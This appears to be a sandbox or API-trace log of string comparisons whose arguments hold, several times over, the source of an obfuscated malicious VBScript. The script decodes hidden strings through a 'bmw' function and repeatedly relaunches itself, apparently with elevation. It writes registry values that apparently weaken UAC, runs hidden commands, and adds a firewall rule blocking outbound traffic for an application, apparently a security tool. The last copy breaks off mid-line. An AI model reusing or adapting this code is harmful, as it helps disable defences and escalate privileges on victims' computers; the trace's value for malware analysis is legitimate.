bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.974] wcsncmp (_String1="Function criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0222.975] wcsncmp (_String1="unction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0222.975] wcsncmp (_String1="nction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.975] wcsncmp (_String1="ction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.975] wcsncmp (_String1="tion criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 